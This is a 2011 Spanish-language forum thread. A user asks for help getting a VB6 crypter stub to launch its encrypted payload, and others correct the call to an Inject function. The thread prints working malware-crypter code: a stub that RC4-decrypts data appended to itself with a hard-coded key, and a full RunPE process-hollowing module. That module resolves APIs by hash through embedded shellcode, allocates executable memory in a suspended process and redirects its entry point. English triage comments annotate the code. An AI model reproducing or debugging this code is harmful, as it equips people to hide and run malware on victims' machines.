
duda con runpe

Publicado: 03 Dic 2011, 19:15
por djkiraly
Hola amigos, estoy utilizando la tool de M3n3g@tt1, runpe generator m3, y estoy desesperado: he intentado de todas las maneras llamar al runpe. De todas las opciones que he hecho esta es la mejor, porque no me da ningún error, pero pasa una cosa: no abre el encriptado. A ver si me podéis echar un cable con la llamada del runpe; os dejo el stub y el runpe para que lo veáis. Gracias a todos.


' Entry point of the loader stub as posted.
' Reads the stub's own executable from disk, takes the part that follows the
' "[Theref]" marker, RC4-decrypts it with a hard-coded key and hands the
' result to Inject. RC4 and Inject are defined outside this listing.
' Triage note: the marker and the key are literals in the code, so the appended
' data can be located by the marker and decrypted offline with the same key.
Sub Main()

Dim SHIT As String

' Full path of the running executable (the stub itself).
SHIT = App.Path & "\" & App.EXEName & ".exe"

Dim Data As String

Open SHIT For Binary As #1

' Read the whole file into a String sized to the file length.
Data = Space(LOF(1))
Get #1, , Data
Close #1

Dim Delimiter() As String

' Element 1 is whatever follows the first "[Theref]" marker in the file.
Delimiter() = Split(Data, "[Theref]")
' Decrypt in place; RC4 is not shown on this page.
Delimiter(1) = RC4(Delimiter(1), "therefenge")
' Arguments as written: own path, decrypted data converted with vbFromUnicode,
' and the command line the stub was started with.
Call Inject(App.Path & "\" & App.EXEName & ".exe", StrConv(Delimiter(1), vbFromUnicode), Command)

End Sub


' Module-level declarations for the loader module.
' Identifiers are machine-generated (randomised); the comments describe each
' item by how the code in this module uses it.
Option Explicit

Option Base 0

' 4-byte wrapper around a Long; source side of the LSet copy in oDqNpsCs.
Private Type MopFlsArsNh
StsGuthRmoOALo As Long

End Type

' Four single bytes; destination side of the LSet copy in oDqNpsCs, used to
' emit a Long byte by byte.
 Private Type EqMlFsPpRtjMRlJi

RqhJBisFAlmERunFC  As Byte
CqnSNmLj  As Byte
B3  As Byte
MtGlliJjpGt  As Byte

End Type

' The only API declared in this module. pOp passes it the address of a Byte
' array as the first argument, so user32 transfers control to those bytes.
' Triage note: this Declare combined with VarPtr(<Byte array>) at the call
' sites is a static indicator that the module runs code built at run time.
 Private Declare Function CallWindowProcA Lib "user32" (ByVal DpiSQlOm As Long, Optional ByVal FtqLSBJrt As Long, Optional ByVal PhpQnqoKo As Long, Optional ByVal GnlAFuhnm As Long, Optional ByVal KjoFLpCQq As Long) As Long

' True once qSmirQoBrnoKj has been filled (see pOp).
Private KGisSrLPA As Boolean

' 171-byte buffer that pOp fills with fixed machine code on first use.
Private qSmirQoBrnoKj(170)        As Byte


' 256-byte scratch buffer in which pOp assembles a per-call thunk.
Private DhiEChoMJPBD(255)            As Byte
' Library names handed to pOp together with a 32-bit hash.
Private Const kernel32          As String = "KERNEL32"
Private Const NTDLL             As String = "NTDLL"

' Starts the executable at piqGu as a new suspended process and replaces its
' image with the PE file held in EiLCQBnltrFqlBhmOlDoFm (the sequence usually
' called process hollowing, "RunPE" in the thread).
'
' Parameters:
'   EiLCQBnltrFqlBhmOlDoFm() - bytes of the PE file to place in the new process.
'   piqGu                    - path used as the application name of the new process.
'   KCjEOhoNOE               - optional command line for the new process.
'   lMnOrSiGmNmOiLului       - optional out value; receives BuLmCoDuiAEp(0).
' Returns: True whenever both header checks pass. No pOp result is examined,
' so True does not show that any step succeeded.
'
' Every API is reached through pOp by library name plus a 32-bit hash. The API
' names in the comments below are inferred from the argument lists, not
' recovered from the hashes - confirm them when analysing a sample.
' Header offsets assume a 32-bit (PE32) image.
'
' Behaviour visible to monitoring: process creation with flag &H4, then
' cross-process allocation with protection &H40, cross-process writes, a thread
' context change and a thread resume, all from the same parent.
Public Function Inject(ByRef EiLCQBnltrFqlBhmOlDoFm() As Byte, ByVal piqGu As String, Optional ByVal KCjEOhoNOE As String, Optional ByRef lMnOrSiGmNmOiLului As Long) As Boolean
  Dim tJnPPqrREonrDn               As Long
  Dim AoDtpNuE    As Long
  Dim RsqtPn        As Long
  Dim jnltLGnP                As Long
  Dim RjGnFoioRp                        As Long
  Dim puomPFFDEArs(16)         As Long
  Dim BuLmCoDuiAEp(3) As Long
  Dim iusrnACC(50)             As Long

' Address of the first byte of the supplied PE image.
tJnPPqrREonrDn = VarPtr(EiLCQBnltrFqlBhmOlDoFm(0))
' The first two bytes must be &H5A4D ("MZ"); otherwise return False.
If Not jRhBsmoCijAropDorNntNiqNhnGl(tJnPPqrREonrDn, 2) = &H5A4D Then Exit Function
' The dword at +&H3C is the file offset of the PE header.
AoDtpNuE = tJnPPqrREonrDn + jRhBsmoCijAropDorNntNiqNhnGl(tJnPPqrREonrDn + &H3C)
' The PE header must start with &H4550 ("PE" followed by two zero bytes).
If Not jRhBsmoCijAropDorNntNiqNhnGl(AoDtpNuE) = &H4550 Then Exit Function
' PE header +&H34: ImageBase (PE32 layout).
jnltLGnP = jRhBsmoCijAropDorNntNiqNhnGl(AoDtpNuE + &H34)
' First Long of the 68-byte block is set to its own size (&H44), consistent
' with a STARTUPINFO structure.
puomPFFDEArs(0) = &H44
  ' Ten arguments in the shape of CreateProcessW; the &H4 in the flags position
  ' is CREATE_SUSPENDED. BuLmCoDuiAEp receives the result block; the code below
  ' uses (0) as the process handle and (1) as the thread handle.
  Call pOp(kernel32, &H16B3FE88, StrPtr(piqGu), StrPtr(KCjEOhoNOE), 0, 0, 0, &H4, 0, 0, VarPtr(puomPFFDEArs(0)), VarPtr(BuLmCoDuiAEp(0)))
  ' (process handle, image base): presumably NtUnmapViewOfSection.
  Call pOp(NTDLL, &HF21037D0, BuLmCoDuiAEp(0), jnltLGnP)
  ' Argument shape of NtAllocateVirtualMemory: size taken from header +&H50
  ' (SizeOfImage), type &H3000 (MEM_COMMIT Or MEM_RESERVE), protection &H40
  ' (PAGE_EXECUTE_READWRITE).
  Call pOp(NTDLL, &HD33BCABD, BuLmCoDuiAEp(0), VarPtr(jnltLGnP), 0, VarPtr(jRhBsmoCijAropDorNntNiqNhnGl(AoDtpNuE + &H50)), &H3000, &H40)
  ' Argument shape of NtWriteVirtualMemory: copies header +&H54 (SizeOfHeaders)
  ' bytes from the start of the image to the image base in the new process.
  Call pOp(NTDLL, &HC5108CC2, BuLmCoDuiAEp(0), jnltLGnP, VarPtr(EiLCQBnltrFqlBhmOlDoFm(0)), jRhBsmoCijAropDorNntNiqNhnGl(AoDtpNuE + &H54), 0)
' Header +&H6 (2 bytes): NumberOfSections.
For RjGnFoioRp = 0 To jRhBsmoCijAropDorNntNiqNhnGl(AoDtpNuE + &H6, 2) - 1
' Section headers start at header +&HF8 and are &H28 bytes each.
RsqtPn = AoDtpNuE + &HF8 + (&H28 * RjGnFoioRp)
  ' Copies the section: destination base + VirtualAddress (+&HC), source
  ' buffer + PointerToRawData (+&H14), length SizeOfRawData (+&H10).
  Call pOp(NTDLL, &HC5108CC2, BuLmCoDuiAEp(0), jnltLGnP + jRhBsmoCijAropDorNntNiqNhnGl(RsqtPn + &HC), tJnPPqrREonrDn + jRhBsmoCijAropDorNntNiqNhnGl(RsqtPn + &H14), jRhBsmoCijAropDorNntNiqNhnGl(RsqtPn + &H10), 0)
Next RjGnFoioRp
' First Long of the 204-byte buffer; &H10007 matches CONTEXT_FULL for x86.
iusrnACC(0) = &H10007
  ' (thread handle, buffer): presumably NtGetContextThread.
  Call pOp(NTDLL, &HE935E393, BuLmCoDuiAEp(1), VarPtr(iusrnACC(0)))
  ' Writes the 4-byte image base to the address in element 41 plus 8.
  ' NOTE(review): element 41 is byte offset &HA4, Ebx in the x86 CONTEXT
  ' layout, which would make the target the image-base field of the new
  ' process's PEB - confirm against the structure definitions.
  Call pOp(NTDLL, &HC5108CC2, BuLmCoDuiAEp(0), iusrnACC(41) + &H8, VarPtr(jnltLGnP), &H4, 0)
' Element 44 (byte offset &HB0, Eax in the same layout - confirm) is set to
' image base + header +&H28 (AddressOfEntryPoint).
iusrnACC(44) = jnltLGnP + jRhBsmoCijAropDorNntNiqNhnGl(AoDtpNuE + &H28)
  ' (thread handle, buffer): presumably NtSetContextThread.
  Call pOp(NTDLL, &H6935E395, BuLmCoDuiAEp(1), VarPtr(iusrnACC(0)))
  ' (thread handle, 0): presumably NtResumeThread.
  Call pOp(NTDLL, &HC54A46C8, BuLmCoDuiAEp(1), 0)
 ' Hand the process handle back to the caller and report success.
 lMnOrSiGmNmOiLului = BuLmCoDuiAEp(0)
 Inject = True
End Function
 ' Reads lSize bytes (default 4) from address lPtr and returns them as a Long.
 ' Implemented as a copy through pOp with the same hash Inject uses for its
 ' memory writes: handle -1 in the process-handle position (the current
 ' process), destination the function's own return slot, source lPtr.
 ' With lSize = 2 only the low two bytes of the result are written.
 Private Function jRhBsmoCijAropDorNntNiqNhnGl(ByVal lPtr As Long, Optional ByVal lSize As Long = &H4) As Long
Call pOp(NTDLL, &HC5108CC2, -1, VarPtr(jRhBsmoCijAropDorNntNiqNhnGl), lPtr, lSize, 0)
 End Function
 ' Calls a library export identified by library name and a 32-bit hash,
 ' without a Declare statement for that export.
 '
 ' Parameters:
 '   OjiAimDRt - library name (callers pass "KERNEL32" or "NTDLL").
 '   JrClh     - 32-bit hash identifying the export.
 '   KniF      - arguments for the export; each is converted with CLng.
 ' Returns: the value CallWindowProcA returns after running the thunk, or 0
 ' when the resolver returned 0 (no thunk is built or run in that case).
 '
 ' Two byte buffers are executed as code through CallWindowProcA:
 '   qSmirQoBrnoKj - fixed 171-byte resolver, filled once on first use.
 '   DhiEChoMJPBD  - thunk rebuilt on every call: one "&H68 + 4 bytes" group
 '                   per argument (x86 push imm32), then &HB8 + address
 '                   (mov eax, imm32), &HFF &HD0 (call eax), &HC3 (ret).
 ' NOTE(review): the resolver bytes contain fs:[&H30] access and the
 ' "ror 13 / add" pattern (&HC1 &HCF &HD, &H1 &HC7), i.e. the widely published
 ' PEB-walking, hash-matching export resolver; &HEC0E4EA4 near its start is the
 ' value commonly documented for LoadLibraryA. Confirm by disassembly.
 ' Triage note: because of this, the APIs used by Inject do not appear as
 ' Declares in this module; the hashes and this byte sequence are the static
 ' indicators instead.
 Public Function pOp(ByVal OjiAimDRt As String, ByVal JrClh As Long, ParamArray KniF() As Variant) As Long
 Dim RsMSNl                    As Variant
 Dim qtKjtmEO                   As EqMlFsPpRtjMRlJi
 Dim mnRCqmBDinupo                     As Long
 Dim RjGnFoioRp                        As Long
 Dim tqnMhrr                        As Long

' One-time fill of the resolver buffer; KGisSrLPA guards against refilling.
If Not KGisSrLPA Then
  For RjGnFoioRp = 0 To 170
qSmirQoBrnoKj(RjGnFoioRp) = CByte(Choose(RjGnFoioRp + 1, &HE8, &H22, &H0, &H0, &H0, &H68, &HA4, &H4E, &HE, &HEC, &H50, &HE8, &H43, &H0, &H0, &H0, &H83, &HC4, &H8, &HFF, &H74, &H24, &H4, &HFF, &HD0, &HFF, &H74, &H24, &H8, &H50, &HE8, &H30, &H0, &H0, &H0, &H83, &HC4, &H8, &HC3, &H56, &H55, &H31, &HC0, &H64, &H8B, &H70, &H30, &H8B, &H76, &HC, &H8B, &H76, &H1C, &H8B, &H6E, &H8, &H8B, &H7E, &H20, &H8B, &H36, &H38, &H47, &H18, &H75, &HF3, &H80, &H3F, &H6B, &H74, &H7, &H80, &H3F, &H4B, &H74, &H2, &HEB, &HE7, &H89, &HE8, &H5D, &H5E, &HC3, &H55, &H52, &H51, _
&H53, &H56, &H57, &H8B, &H6C, &H24, &H1C, &H85, &HED, &H74, &H43, &H8B, &H45, &H3C, &H8B, &H54, &H5, &H78, &H1, &HEA, &H8B, &H4A, &H18, &H8B, &H5A, &H20, &H1, &HEB, &HE3, &H30, &H49, &H8B, &H34, &H8B, &H1, &HEE, &H31, &HFF, &H31, &HC0, &HFC, &HAC, &H84, &HC0, &H74, &H7, &HC1, &HCF, &HD, &H1, &HC7, &HEB, &HF4, &H3B, &H7C, &H24, &H20, &H75, &HE1, &H8B, &H5A, &H24, &H1, &HEB, &H66, &H8B, &HC, &H4B, &H8B, &H5A, &H1C, &H1, &HEB, &H8B, &H4, &H8B, &H1, &HE8, &H5F, &H5E, &H5B, &H59, &H5A, &H5D, &HC3))
 Next RjGnFoioRp
 ' The loop counter is reused below as the write index into the thunk buffer.
 RjGnFoioRp = 0
KGisSrLPA = True
End If
 ' Run the resolver with the library-name pointer and the hash; the result is
 ' treated as the address of the export (0 = not found).
 mnRCqmBDinupo = CallWindowProcA(VarPtr(qSmirQoBrnoKj(0)), StrPtr(OjiAimDRt), JrClh)
If mnRCqmBDinupo Then
' Emit the arguments from last to first so the first one ends up on top of
' the stack.
For tqnMhrr = UBound(KniF) To LBound(KniF) Step -1
qtKjtmEO = oDqNpsCs(CLng(KniF(tqnMhrr)))
   Call nKjqK(&H68, RjGnFoioRp)
   Call nKjqK(qtKjtmEO.RqhJBisFAlmERunFC, RjGnFoioRp):    Call nKjqK(qtKjtmEO.CqnSNmLj, RjGnFoioRp)
   Call nKjqK(qtKjtmEO.B3, RjGnFoioRp):    Call nKjqK(qtKjtmEO.MtGlliJjpGt, RjGnFoioRp)
Next tqnMhrr

' Load the resolved address, call it, and return to CallWindowProcA.
qtKjtmEO = oDqNpsCs(mnRCqmBDinupo)
   Call nKjqK(&HB8, RjGnFoioRp)
   Call nKjqK(qtKjtmEO.RqhJBisFAlmERunFC, RjGnFoioRp): Call nKjqK(qtKjtmEO.CqnSNmLj, RjGnFoioRp)
   Call nKjqK(qtKjtmEO.B3, RjGnFoioRp):    Call nKjqK(qtKjtmEO.MtGlliJjpGt, RjGnFoioRp)
   Call nKjqK(&HFF, RjGnFoioRp):        Call nKjqK(&HD0, RjGnFoioRp)
   Call nKjqK(&HC3, RjGnFoioRp)
' Execute the thunk; its result becomes pOp's return value.
pOp = CallWindowProcA(VarPtr(DhiEChoMJPBD(0)))
End If
End Function

' Appends one byte to the module-level thunk buffer DhiEChoMJPBD.
'   RtnKssmDESCLBD - byte to store.
'   rKjRoAnlrQ     - write index, passed ByRef and advanced by one.
' No explicit check is made against the buffer's upper bound (255).
Private Sub nKjqK(ByVal RtnKssmDESCLBD As Byte, ByRef rKjRoAnlrQ As Long)
DhiEChoMJPBD(rKjRoAnlrQ) = RtnKssmDESCLBD
rKjRoAnlrQ = rKjRoAnlrQ + 1
End Sub
 ' Splits a Long into its four bytes by copying a one-Long structure onto a
 ' four-Byte structure with LSet. pOp emits the fields in declaration order,
 ' which is the in-memory byte order of the Long.
 Private Function oDqNpsCs(ByVal jBtiMtD As Long) As EqMlFsPpRtjMRlJi
Dim uLptJlthnNlmGolJ                       As MopFlsArsNh
uLptJlthnNlmGolJ.StsGuthRmoOALo = jBtiMtD
' LSet between user-defined types copies the raw bytes.
LSet oDqNpsCs = uLptJlthnNlmGolJ
End Function

                        '*** Modo de uso : Call Inject(sByte, sApp.Path , Command) ***


Re: duda con runpe

Publicado: 03 Dic 2011, 19:32
por Flight embedded
A ver, probá así.

' Variant from this reply: stub path first, converted data second, command line third.
Call Inject(SHIT, StrConv(Delimiter(1), vbFromUnicode), Command)

Re: duda con runpe

Publicado: 04 Dic 2011, 12:34
por M3
' Se me permite Ignaro

' Stub entry point as reposted in this reply.
' Same flow as the original post: read the stub's own executable, take the
' data after the "[Theref]" marker, RC4-decrypt it with the hard-coded key,
' convert it to a Byte array and pass it to Inject together with the stub's
' own path and command line. RC4 and Inject are defined outside this listing.
' Triage note: the marker and key are literals, so the appended data can be
' extracted and decrypted offline.
Sub Main()

Dim SHIT As String
Dim sData() As Byte

' Full path of the running executable (the stub itself).
SHIT = App.Path & "\" & App.EXEName & ".exe"

Dim Data As String

Open SHIT For Binary As #1

' Read the whole file into a String sized to the file length.
Data = Space(LOF(1))
Get #1, , Data
Close #1

Dim Delimiter() As String

' Element 1 is whatever follows the first "[Theref]" marker in the file.
Delimiter() = Split(Data, "[Theref]")
Delimiter(1) = RC4(Delimiter(1), "therefenge")

' Convert the decrypted String to a Byte array before the call.
sData = StrConv(Delimiter(1), vbFromUnicode)

' Byte array first, stub path second, command line third.
Call Inject(sData, SHIT, Command)

End Sub

Así te funciona, creo; probá y contanos.

Re: duda con runpe

Publicado: 04 Dic 2011, 15:09
por Metal_Kingdom
A ver, si la función es así:


Public Function Inject(ByRef EiLCQBnltrFqlBhmOlDoFm() As Byte, ByVal piqGu As String, Optional ByVal KCjEOhoNOE As String, Optional ByRef lMnOrSiGmNmOiLului As Long) As Boolean
ByRef EiLCQBnltrFqlBhmOlDoFm() As Byte = el archivo a cargar (desencriptado o no, depende pa lo que lo uses xD)...
ByVal piqGu As String = host (proceso desde el que será inyectado en memoria), por ejemplo el propio stub.. de ahí el app.path & "\" & ............
Resto de parametros opcionales.

Por lo tanto así mismo te sirve, se podría hacer un bonito pseudocódigo aquí todo en la misma línea, desencriptando e incluso metiendo ahi el split xD, pero pa que no te líes:


' Variant from this reply: converted data first, stub path second; the optional arguments are omitted.
Call Inject(StrConv(Delimiter(1), vbFromUnicode), shit)
Saludos!!

Re: duda con runpe

Publicado: 09 Dic 2011, 14:29
por Slek
Tal y como ha dicho Metal

Si quieres pasarle los parámetros:


' Variant from this reply: as above, with the stub's own command line (Command$) forwarded as the third argument.
Call Inject(StrConv(Delimiter(1), vbFromUnicode), SHIT, Command$)
Es preferible usar la variante String de Command, más que nada para evitar conversiones y variables innecesarias

@djkiraly : Mírate algo sobre los tipos de datos en VB...

Saludos!